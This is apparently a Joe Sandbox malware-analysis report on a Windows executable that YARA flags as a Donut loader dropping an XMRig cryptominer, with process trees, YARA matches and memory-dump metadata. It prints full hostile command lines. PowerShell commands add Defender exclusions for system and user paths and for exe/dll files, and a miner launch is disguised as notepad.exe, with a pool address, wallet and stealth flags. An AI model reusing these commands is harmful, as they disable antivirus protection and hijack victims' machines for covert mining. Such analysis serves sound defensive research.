                                                  Jan 12, 2025 14:20:10.882807016 CET1.1.1.1192.168.2.40x10c1No error (0)pool.hashvault.pro80.240.16.67A (IP address)IN (0x0001)false
                                                  Jan 12, 2025 14:20:10.882807016 CET1.1.1.1192.168.2.40x10c1No error (0)pool.hashvault.pro192.248.189.11A (IP address)IN (0x0001)false

                                                  Click to jump to process

                                                  Click to jump to process

                                                  • File
                                                  • Registry
                                                  • Network

                                                  Click to dive into process behavior distribution

                                                  Target ID:0
                                                  Start time:08:19:02
                                                  Start date:12/01/2025
                                                  Path:C:\Users\user\Desktop\9d2h99wrj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\9d2h99wrj.exe"
                                                  Imagebase:0x400000
                                                  File size:31'161'344 bytes
                                                  MD5 hash:88848246CE109235A762FCD193210CAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:08:19:02
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                  Imagebase:0x7ff6fc9a0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  Target ID:5
                                                  Start time:08:19:05
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\notepad.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
                                                  Imagebase:0x7ff7c9fc0000
                                                  File size:201'216 bytes
                                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:08:19:07
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  Execution Graph

                                                  Execution Coverage

                                                  Dynamic/Packed Code Coverage

                                                  Signature Coverage

                                                  Execution Coverage:56.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:12
                                                  Total number of Limit Nodes:0
                                                  Show Legend
                                                  Hide Nodes/Edges
                                                  execution_graph 140 4022fa 141 40232c 140->141 144 40224f 141->144 143 4023e5 145 402285 144->145 148 4010c4 145->148 147 4022be 147->143 149 402480 148->149 150 4010e7 memset 149->150 151 40115b 150->151 152 401214 sprintf 151->152 153 4012bd 152->153 153->147

                                                  Callgraph

                                                  Hide Legend
                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_00401000 1 Function_00401443 2 Function_004010C4 2->0 8 Function_00401D58 2->8 10 Function_00401D18 2->10 11 Function_004019D8 2->11 12 Function_00401D98 2->12 13 Function_00401C98 2->13 3 Function_004021EC 4 Function_0040224F 4->2 4->3 9 Function_00402158 4->9 5 Function_004018EF 7 Function_004014B4 5->7 6 Function_00401970 7->1 7->6 8->5 10->5 11->5 12->5 13->5 14 Function_004022FA 14->4

                                                  Executed Functions

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID: memsetsprintf
                                                  • String ID:
                                                  • API String ID: 4041149307-0
                                                  • Opcode ID: e727ce3e58741238816f323a6d79e7f2e46f41a9eb5bf133fa8bd177935b8c99
                                                  • Instruction ID: f42f3db9e911078cd29f191bc02fc638327fde49476f8f6eb4d1a9ddc33515eb
                                                  • Opcode Fuzzy Hash: e727ce3e58741238816f323a6d79e7f2e46f41a9eb5bf133fa8bd177935b8c99
                                                  • Instruction Fuzzy Hash: 08712B61702B148DEB909B27DC5139A37A8F749FC8F804176EE4CA7B98EE3DCA448744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                  Strings
                                                  • wa:!ssse5ql&=bd<6w$!r18=[isand=/, xrefs: 00401098
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wa:!ssse5ql&=bd<6w$!r18=[isand=/
                                                  • API String ID: 0-769508457
                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aa0e2a09c1abec3deb507259b7a255694b188a669ba650c1f241373fa21637f
                                                  • Instruction ID: b415c43fc2c1dcddfc336275db34ec18ce7294bf7f95de5c83b38c0f79690ff0
                                                  • Opcode Fuzzy Hash: 5aa0e2a09c1abec3deb507259b7a255694b188a669ba650c1f241373fa21637f
                                                  • Instruction Fuzzy Hash: BA2119A4301A1488EA95DB67DE5939933B8B749FC8F814436AE0CA73A5EF7CC5008354

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID: memsetsprintf
                                                  • String ID:
                                                  • API String ID: 4041149307-0
                                                  • Opcode ID: 2d44f8016637547563c89ddc85482b4c5d763b167245da18f53ac4b4f74bed44
                                                  • Instruction ID: e4f65d57c291f29f9d583fff8413c93034d11ea512355bbfc0681e4c65468b10
                                                  • Opcode Fuzzy Hash: 2d44f8016637547563c89ddc85482b4c5d763b167245da18f53ac4b4f74bed44
                                                  • Instruction Fuzzy Hash: 0D01DDB6701B8889DB50DF6ADD8538833A8B308FC8F014826AE0CA7B68DB38C6118744

                                                  Non-executed Functions

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 133 401d58-401d97 call 4018ef
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                  • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                  • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                  • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 401d18-401d57 call 4018ef
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                  • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                  • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                  • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 124 4019d8-401a17 call 4018ef
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                  • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                  • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                  • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94

